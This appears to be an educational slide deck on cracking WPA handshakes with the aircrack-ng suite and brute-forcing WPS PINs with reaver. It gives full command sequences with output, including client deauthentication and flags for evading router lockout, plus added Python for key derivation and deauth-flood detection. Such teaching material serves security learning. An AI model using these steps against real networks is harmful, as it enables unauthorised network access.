Wireless Attacks: WPA/WPS



  1. Wireless Attacks: WPA/WPS
     Module Type: Basic Method
     Module Number: 0x01
     Last Updated: 2017-01-16
     Author: Hermit

  2. Topics
     • Common Terminology
     • What is WPA?
     • How is WPA Vulnerable?
     • The WPA Attack: Step by Step
     • The WPS Attack: Step by Step
     • Additional resources

  3. Common Terminology
     • Wireless Local Area Network (WLAN)
       • A network that is connected wirelessly instead of with physical cables. Clients communicate with access points (AP), which relay traffic to external networks. Defined by the 802.11 specification.
     • Radio Frequency (RF)
       • An electromagnetic wave, such as AM or FM radio. When referring to WLANs we use pre-defined values called channels, numbered from 1 through 14.
     • Initialization Vector (IV)
       • A number intended to be used only once as a random seed (alongside a common secret) in cryptography, to uniquely encode data. IVs are also sometimes called “nonces” (meaning “used only once”).

  4. Common Terminology
     • The 802.11 specification defines seven modes for wireless network devices:
       • Master: Act as an AP
       • Managed: Act as a client
       • Monitor: Monitor all traffic, not just one network, without associating first
       • Promiscuous: Pass all traffic to the CPU; does require associating first, but allows injection back into associated networks
       • Ad-hoc: There is no central AP or infrastructure. Each device communicates directly with each other device. Ad-hoc and mesh are not exclusive.
       • Mesh: Each device can relay/route packets for other devices, but devices do not communicate directly with each other.
       • Repeater: Act as a “dumb” repeater and retransmit received signals.

  5. Common Terminology
     • Service Set Identifier (SSID)
       • The human-readable “friendly” name of a WLAN.
     • Basic SSID (BSSID)
       • The MAC address of an AP.
     • Extended SSID (ESSID)
       • A collection of BSSIDs, functionally considered equivalent to an SSID.

  6. What is WPA?
     • Wi-Fi Protected Access (WPA) is a security protocol for WLANs that was intended to address the weaknesses of WEP, and which was an interim solution until what we now know as WPA2 became widely available and supported.
     • It uses a 256-bit key, most commonly derived by running Password-Based Key Derivation Function 2 (PBKDF2) against the password, salted with the SSID.
     • It also introduced Wi-Fi Protected Setup (WPS), which as implemented has become a massive security hole.
     • It uses Temporal Key Integrity Protocol (TKIP), meaning that each packet gets a unique key. This is fed to RC4 (just like WEP) to encrypt.
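     The key derivation this slide describes, as an added illustration that is not part of the original deck: the 256-bit Pairwise Master Key is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt and 4096 iterations. The check value is the published IEEE 802.11i Annex H test vector; the rate used in the cost helpers is the 3102.56 k/s figure from the aircrack-ng output on slide 21, and the function names are my own.

```python
import hashlib

WPA_PBKDF2_ITERATIONS = 4096   # fixed by IEEE 802.11i
WPA_PMK_LEN = 32               # 256-bit Pairwise Master Key (PMK)

# Published IEEE 802.11i Annex H test vector, used to check the derivation.
IEEE_TEST_PASSPHRASE, IEEE_TEST_SSID = "password", "IEEE"
IEEE_TEST_PMK_HEX = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).

    The SSID is the salt, so one passphrase on two networks gives two unrelated
    PMKs, and a precomputed PMK table only applies to the SSID it was built for.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"),
                               WPA_PBKDF2_ITERATIONS, WPA_PMK_LEN)


def hmac_ops_per_guess() -> int:
    """HMAC-SHA1 calls needed to test one candidate passphrase.

    SHA-1 yields 20 bytes per PBKDF2 block, so a 32-byte PMK needs two blocks
    of 4096 HMACs each. This fixed cost is why aircrack-ng reports thousands,
    not millions, of keys per second on a CPU.
    """
    blocks = -(-WPA_PMK_LEN // hashlib.sha1().digest_size)   # ceil(32 / 20) = 2
    return blocks * WPA_PBKDF2_ITERATIONS


def wordlist_time_seconds(candidates: int, keys_per_second: float) -> float:
    """Seconds to exhaust a wordlist at a measured rate.

    Slide 21 shows 7,120,712 candidates at 3102.56 k/s, i.e. about 38 minutes.
    """
    return candidates / keys_per_second


def keyspace_time_seconds(alphabet: int, length: int, keys_per_second: float) -> float:
    """Seconds to exhaust every string of `length` symbols from an `alphabet`.

    At the same 3102.56 k/s, all 8-character lowercase passphrases (26**8) take
    over two years: the defender's argument for long, random passphrases.
    """
    return (alphabet ** length) / keys_per_second


if __name__ == "__main__":
    assert derive_pmk(IEEE_TEST_PASSPHRASE, IEEE_TEST_SSID).hex() == IEEE_TEST_PMK_HEX
    print("HMAC-SHA1 ops per guess:", hmac_ops_per_guess())
    print("rockyou.txt at 3102.56 k/s: %.0f s" % wordlist_time_seconds(7120712, 3102.56))
```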

  7. How is WPA Vulnerable?
     • WPA fixed the random key weakness of WEP for RC4 since each 128-bit key is unique.
     • Unfortunately, multiple cryptographic weaknesses were found with this as well, including the ability to inject arbitrary numbers of packets into a network for which you don’t know the passphrase, and decryption of arbitrary packets as well.
     • This presentation focuses on the actual passphrase recovery techniques against WPA and WPS. A future presentation will describe the arbitrary injection technique.
     • The attacks are focused on the authentication handshake (for WPA itself) and a brute-force enumeration technique (for WPS).
     • There was a recently disclosed flaw in the random number generator that allows for recovery of the WPA2-Enterprise group key and arbitrary injection as well.

  8. The WPA Attack Step-by-Step

  9. Attack Setup
     • This assumes that you have a 2016 release of Kali Linux installed, as well as hardware capable of being put into monitor mode.
     • If in doubt, get an Alfa card.
     • All commands are expected to be run with superuser (i.e. root) privileges.
     • The aircrack-ng suite is expected to be part of the installation.

  10. The WPA Attack: Step by Step (Overview)
      • Open a terminal window.
      • Kill any potentially conflicting applications/services.
      • Identify your wireless device.
      • Put your wireless device into monitor mode.
      • Verify monitor mode.
      • Identify target network and a specific client.
      • Begin packet capture from target network.
      • De-authenticate the chosen client.
      • Crack WPA shared key.

  11. The WPA Attack: Step 1 • Open a terminal window… no graphics here, because if you can’t do this part then the rest of this guide is really beyond you.

  12. The WPA Attack: Step 2
      • Kill any potentially conflicting applications/services.
        airmon-ng check kill

        root@:~# airmon-ng check kill
        Killing these processes:

          PID Name
         5664 wpa_supplicant

  13. The WPA Attack: Step 3
      • Identify your wireless device (we’ll use “wlan0” for this tutorial).
        ifconfig -a

  14. The WPA Attack: Step 4
      • Put your wireless device into monitor mode.
        airmon-ng start wlan0

        root@:~# airmon-ng start wlan0

        PHY     Interface       Driver          Chipset
        phy0    wlan0           ath9k           Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)

                        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                        (mac80211 station mode vif disabled for [phy0]wlan0)

  15. The WPA Attack: Step 5
      • Verify monitor mode.
        ifconfig -a

  16. The WPA Attack: Step 6
      • Identify target network (write down SSID, channel, and BSSID) and client (write down MAC address).
        airodump-ng wlan0mon

        CH 14 ][ Elapsed: 0 s ][ 2017-01-10 10:16

        BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

        AA:BB:CC:DD:EE:FF  -49        2        1    0   9  54e  WPA2 TKIP   PSK  REDACTED
        AA:BB:CC:DD:EE:FF  -53        2        0    0   6  54e. WEP  WEP         <length:  1>
        AA:BB:CC:DD:EE:FF  -52        4        0    0   6  54e. OPN              REDACTED
        AA:BB:CC:DD:EE:FF  -81        2        0    0   1  54e  WPA2 CCMP   PSK  REDACTED
        99:88:77:66:55:44  -44        3       11    0   1  54 . WPA  TKIP   PSK  WPAVICTIM
        AA:BB:CC:DD:EE:FF  -86        0        3    0   1  54e  WPA2 CCMP   PSK  REDACTED
        AA:BB:CC:DD:EE:FF   -1        0        0    0   1  -1                    <length:  0>

        BSSID              STATION            PWR   Rate    Lost    Frames  Probe

        99:88:77:66:55:44  00:11:22:33:44:55  -37   48e-18e     0       10
        AA:BB:CC:DD:EE:FF  F0:7B:CB:2E:9A:5D  -87    0 - 1      0        7

  17. The WPA Attack: Step 7
      • Begin packet capture from target network. Leave this running while you do the next step.
        airodump-ng --channel {#} --bssid {BSSID} -a -w /tmp/WPAVICTIM-DEMO wlan0mon

        root@:~# airodump-ng --channel 1 --bssid 99:88:77:66:55:44 -a -w /tmp/WPAVICTIM-DEMO wlan0mon

        CH  1 ][ Elapsed: 6 s ][ 2017-01-10 10:21

        BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

        99:88:77:66:55:44  -42  71       89       74    7   1  54e. WPA  TKIP   PSK  WPAVICTIM

        BSSID              STATION            PWR   Rate    Lost    Frames  Probe

        99:88:77:66:55:44  00:11:22:33:44:55  -36   48e-24e   576      130

  18. The WPA Attack: Step 8
      • De-authenticate the selected client to force a reconnect so you can capture the WPA handshake. Run this in a separate terminal window while leaving the other programs executing (the template below matches the run shown; {count} is the number of deauth bursts to send):
        aireplay-ng -0 {count} -a {BSSID} -c {STATION} wlan0mon

        root@:~# aireplay-ng -0 5 -a 99:88:77:66:55:44 -c 00:11:22:33:44:55 wlan0mon
        10:22:51  Waiting for beacon frame (BSSID: 99:88:77:66:55:44) on channel 1
        10:22:52  Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55] [31|55 ACKs]
        10:22:52  Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55] [14|109 ACKs]
        10:22:53  Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55] [14|73 ACKs]
        10:22:53  Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55] [12|68 ACKs]
        10:22:54  Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55] [ 9|62 ACKs]

  19. The WPA Attack: Step 9
      • Verify handshake capture in your capture window.

        CH  1 ][ Elapsed: 6 s ][ 2017-01-10 10:21 ][ WPA handshake: 99:88:77:66:55:44

        BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

        99:88:77:66:55:44  -42  71       89       74    7   1  54e. WPA  TKIP   PSK  WPAVICTIM

        BSSID              STATION            PWR   Rate    Lost    Frames  Probe

        99:88:77:66:55:44  00:11:22:33:44:55  -36   48e-24e   576      130

  20. The WPA Attack: Step 10 (Version 1)
      • Crack WPA shared key (your file name will vary based upon how many times you have started the capture). Do this in a third terminal window.
        aircrack-ng -w /path/to/wordlist -e {SSID} WPA-DEMO-02.cap
      • Leave this running and it will automatically retry whenever a new candidate IV capture threshold is reached until the key is recovered.

  21. The WPA Attack: Step 10 (Version 1)

        root@:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt -e WPAVICTIM /tmp/WPAVICTIM-DEMO-02.cap
        Opening /tmp/WPAVICTIM-DEMO-02.cap
        Reading packets, please wait...

                                       Aircrack-ng 1.2 rc4

              [00:00:01] 3276/7120712 keys tested (3102.56 k/s)

              Time left: 38 minutes, 14 seconds                          0.05%

                                 KEY FOUND! [ nopassword ]

              Master Key     : 99 89 C4 7C F5 7D 12 2B E4 FB F7 5F AC F0 4E 1D
                               73 FE B9 16 FD D1 5A 3E 97 5E 28 25 9A D7 07 F4

              Transient Key  : 84 31 80 67 D8 28 E0 B1 5C 49 81 42 33 B0 D9 1C
                               0A 1D 6D 77 59 EE 1E F1 1A 40 E3 82 82 A4 54 22
                               35 14 06 33 8F 13 47 1D 47 5B 99 BF 60 8A 9F C2
                               AB C3 89 94 1B F5 53 77 F8 D8 6C 98 30 DD AA BC

              EAPOL HMAC     : 26 54 A4 8F BC 0A D3 5E A9 B4 31 C4 64 FA 9E 24

  22. The WPA Attack: Step 10 (Version 2)
      • Crack WPA shared key (your file name will vary based upon how many times you have started the capture).
        john -stdout:{#} -incremental | aircrack-ng -w - -e {SSID} WPA-DEMO-02.cap
      • This brute-forces every option up to {#} characters until the key is found. It works by redirecting John the Ripper’s incremental password generation from STDOUT via the pipe to STDIN, and then using the Linux special character “-” to tell aircrack-ng to treat STDIN like a file.

  23. The WPA Attack: Step 10 (Version 2)

        root@Vitruvian:~# john -stdout:10 -incremental | aircrack-ng -e WPAVICTIM -w - /tmp/WPAVICTIM-DEMO-02.cap
        Opening /tmp/WPAVICTIM-DEMO-02.cap
        Warning: MaxLen = 13 is too large for the current hash type, reduced to 10
        Press 'q' or Ctrl-C to abort, almost any other key for status
        Opening /tmp/WPAVICTIM-DEMO-02.cap
        Reading packets, please wait...

                                       Aircrack-ng 1.2 rc4

              [00:00:03] 6690 keys tested (1736.15 k/s)

                             Current passphrase: portugal

              Master Key     : B6 20 C4 AA A1 8B 39 4C E0 6F B5 15 91 C4 81 43
                               C1 F4 92 2C EE 34 4C C4 D9 1B AA E4 C7 2D 5C 30

              Transient Key  : 28 7F BF 41 EC 19 72 7C B6 ED 9C 78 54 54 B5 98
                               EE 74 9A 5F 48 2E 1C 87 DE 6A AA 84 92 CE 3C DF
                               98 3B D1 4A 2E 8D E2 CE 60 77 FF 55 E2 47 39 B9
                               E3 75 29 23 46 FC AC 4B 17 A7 ED 8D 5D 74 7A 9E

              EAPOL HMAC     : 04 31 E3 87 14 83 BC 7D 30 9A 0D 1F 9D 91 D1 03
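      Step 8 works because deauthentication frames are unauthenticated in WPA/WPA2 unless 802.11w (Protected Management Frames) is enabled; the defender-side counterpart is to notice the burst. This added example, which is not part of the original deck, runs a sliding-window detector over a constructed frame log that mimics the “Sending 64 directed DeAuth” pattern using the slide’s demo addresses; the MgmtFrame record, its field names and the thresholds are my assumptions, not a real capture format.

```python
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Iterable, List


@dataclass(frozen=True)
class MgmtFrame:
    """Minimal constructed view of an 802.11 frame (assumed field names)."""
    ts: float      # capture timestamp in seconds
    subtype: str   # "beacon", "deauth", "disassoc", ...
    bssid: str     # transmitting AP
    dst: str       # receiver address; ff:ff:ff:ff:ff:ff is broadcast


def detect_deauth_flood(frames: Iterable[MgmtFrame], window_s: float = 1.0,
                        threshold: int = 10) -> List[dict]:
    """Flag (BSSID, station) pairs that receive more than `threshold`
    deauth/disassoc frames within any sliding window of `window_s` seconds.

    A healthy AP sends these rarely (idle timeout, roaming); aireplay-ng -0
    sends 64 per burst, so a low threshold separates the two cleanly.
    One alert is raised per pair, at the first crossing.
    """
    recent = defaultdict(deque)   # (bssid, dst) -> timestamps inside the window
    alerted, alerts = set(), []
    for f in sorted(frames, key=lambda x: x.ts):
        if f.subtype not in ("deauth", "disassoc"):
            continue
        key = (f.bssid, f.dst)
        q = recent[key]
        q.append(f.ts)
        while q and f.ts - q[0] > window_s:   # drop frames that aged out
            q.popleft()
        if len(q) > threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"bssid": f.bssid, "station": f.dst,
                           "count": len(q), "first_ts": q[0], "last_ts": f.ts})
    return alerts


def sample_capture() -> List[MgmtFrame]:
    """Constructed sample: 10 s of beacons, one legitimate deauth at t=3.0,
    then a 64-frame directed burst at t=6.0 (as in step 8)."""
    ap, sta, bcast = "99:88:77:66:55:44", "00:11:22:33:44:55", "ff:ff:ff:ff:ff:ff"
    frames = [MgmtFrame(t * 0.1, "beacon", ap, bcast) for t in range(100)]
    frames.append(MgmtFrame(3.0, "deauth", ap, sta))
    frames += [MgmtFrame(6.0 + i * 0.005, "deauth", ap, sta) for i in range(64)]
    return frames


if __name__ == "__main__":
    for a in detect_deauth_flood(sample_capture()):
        print("deauth flood: AP %(bssid)s -> %(station)s, %(count)d frames" % a)
```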

  24. The WPS Attack Step-by-Step

  25. Attack Setup
      • This assumes that you have a 2016 release of Kali Linux installed, as well as hardware capable of being put into monitor mode.
      • If in doubt, get an Alfa card.
      • All commands are expected to be run with superuser (i.e. root) privileges.
      • The aircrack-ng suite is expected to be part of the installation.

  26. The WPS Attack: Step by Step (Overview)
      • Open a terminal window.
      • Kill any potentially conflicting applications/services.
      • Identify your wireless device.
      • Put your wireless device into monitor mode.
      • Verify monitor mode.
      • Identify target network.
      • Brute-force WPS PIN for target network.

  27. The WPS Attack: Step 1 • Open a terminal window… no graphics here, because if you can’t do this part then the rest of this guide is really beyond you.

  28. The WPS Attack: Step 2
      • Kill any potentially conflicting applications/services.
        airmon-ng check kill

        root@:~# airmon-ng check kill
        Killing these processes:

          PID Name
         5664 wpa_supplicant

  29. The WPS Attack: Step 3
      • Identify your wireless device (we’ll use “wlan0” for this tutorial).
        ifconfig -a

  30. The WPS Attack: Step 4
      • Put your wireless device into monitor mode.
        airmon-ng start wlan0

        root@:~# airmon-ng start wlan0

        PHY     Interface       Driver          Chipset
        phy0    wlan0           ath9k           Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)

                        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                        (mac80211 station mode vif disabled for [phy0]wlan0)

  31. The WPS Attack: Step 5
      • Verify monitor mode.
        ifconfig -a

  32. The WPS Attack: Step 6
      • Identify target network (write down SSID, channel, and BSSID).
        wash -i wlan0mon

        root@:~# wash -i wlan0mon

        BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
        -------------------------------------------------------------------------------
        99:88:77:66:55:44  1        -50   1.0          No          WPAVICTIM

  33. The WPS Attack: Step 7
      • Brute-force WPS PIN for target network.
        reaver -i wlan0mon -c {channel} -b {BSSID} -vv
      • Or for “hardened” WPS installations:
        reaver -i wlan0mon -c {channel} -b {BSSID} -vv -L -N -T -r 3:30
        The "-L" ignores the locked state being reported by the router. The "-N" disables responding with NACK when out-of-order messages are received (which can occur when you're sending so many attempts). The "-T" sets the M5 and M7 protocol timings to 0.2 seconds (unless you specify an alternate timing). The "-r 3:30" specifies sleeping for 30 seconds after every three attempts, which in my experience is enough to clear the flood detection mechanisms on most routers, but YMMV.

  34. The WPS Attack: Step 7

        root@:~# reaver -i wlan0mon -c 1 -b 99:88:77:66:55:44 -vv
        [+] Switching wlan0mon to channel 1
        [+] Waiting for beacon from 99:88:77:66:55:44
        [+] Associated with 99:88:77:66:55:44 (ESSID: WPAVICTIM)
        [+] Trying pin 12345670
        [+] Sending EAPOL START request
        [+] Received identity request
        [+] Sending identity response
        [+] Sending M1 message
        [+] Sending M2 message
        [+] Received M3 message
        [+] Sending M4 message
        [+] Received M5 message
        [+] Sending M6 message
        [+] Received M7 message
        [+] Sending WSC NACK
        [+] Sending WSC NACK
        {ETC}
        [+] Pin cracked in 9742 seconds
        [+] WPS PIN: '12345678'
        [+] WPA PSK: 'REDACTED'
        [+] AP SSID: 'WPAVICTIM'

  35. Questions?

  36. Additional Resources
      • Technical overview of WEP/WPA cracking methods:
        https://dl.aircrack-ng.org/breakingwepandwpa.pdf
      • Random Number Generator vulnerability:
        https://www.usenix.org/system/files/conference/usenixsecurity16/sec16_paper_vanhoef.pdf
      • WPS Technical Details:
        https://briolidz.wordpress.com/2012/01/10/wi-fi-protected-setup-wps/
      • Hermit:
        https://twitter.com/hermit_hacker
        https://www.cryptolingus.net/
        https://www.stackattack.net/blog/